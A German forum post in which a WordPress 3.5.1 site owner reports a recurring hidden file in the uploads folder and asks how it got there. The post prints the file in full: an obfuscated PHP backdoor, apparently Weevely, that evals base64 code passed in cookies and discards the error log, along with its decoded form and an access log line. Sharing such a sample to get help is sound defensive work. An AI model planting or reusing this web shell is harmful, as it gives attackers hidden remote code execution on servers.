Hallo,
ich habe jetzt zum zweiten mal den Server komplett neu installiert
und Wordpress aufgesetzt.
Schon wieder erscheint eine komische Datei im uploads ordner:
wp-content/uploads/2013/01/.w.php
Inhalt dieser Datei:
<?php
$vaj="JGM9J2NvdW5lfcj0JzskYT0kXlfcj0NPT0tJRTtpZilfcjhyZXNldCglfcjkYSk9PlfcjSdhcycgJiYgJGMoJGlfcjEpPjlfcjMplfcjelfcj2lfcj";
$xnf="luaV9zZXQoJ2Vycm9yXlfcj2xvZycsICcvZGV2L251bGwnKTslfcjkazlfcj0nZDEyMyc7ZWNobyAlfcjnPCcuJGlfcjsuJz4nO2V2YWwoYm";
$vdv = str_replace("az","","azsaztraz_reazplazaazcaze");
$efy="FzZTYlfcj0X2lfcjRlY29kZShwcmVlfcjnX3JlcGxhY2UoYXJlfcjyYXkoJy9bXlx3PVxzXS8nLCcvXlfcjHlfcjMvJyklfcjsIGFycmF5KC";
$lv="lfcjcnlfcjLCcrJyksIGpvaW4oYXJyYXlfcjlfc2xpY2lfcjUlfcjoJGEsJlfcjGMoJGEpLTMpKlfcjSkpKTtlYlfcj2hvICc8LyculfcjJGsuJz4nO30=";
$tm = $vdv("y", "", "ybaysyey6y4y_dyecyodye");
$ov = $vdv("cg","","cgcrecgacgtcgecg_cgfuncgccgticgocgn");
$wg = $ov('', $tm($vdv("lfcj", "", $vaj.$xnf.$efy.$lv))); $wg();
?>
Dekodiert:
createFunction('',
$c='count';
$a=$_COOKIE;
if(reset($a)=='as' && $c($a)>3){
ini_set('error_log', '/dev/null');
$k='d123';
echo '<'.$k.'>';
eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
echo '</'.$k.'>';
}
);
Alles anzeigen
Accesslog liefert:
37.130.227.133 - - [01/Feb/2013:01:41:48 +0100] "GET /wp-content/uploads/2013/01/.w.php HTTP/1.0" 200 13 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
Installiert ist Wordpress 3.5.1 mit dem WooTheme Spektical
TimThumb wurde auf Empfehlung von WooTheme deaktiviert.
Da es nun zum zweiten mal passiert ist frage ich jetzt hier nach.
Ich würde gerne wissen, wie es passiert ist um es
1. nach zustellen um sicher zu gehen, das es behoben ist
2. es beheben
Gibt es ähnliche Fälle wo so etwas passiert ist?
Ich habe auch sonst keine Plugins am laufen.
Danke
Edit: es scheint sich um den Weevely backdoor zu handeln.
nur wie kommt er bitte in diesen Ordner?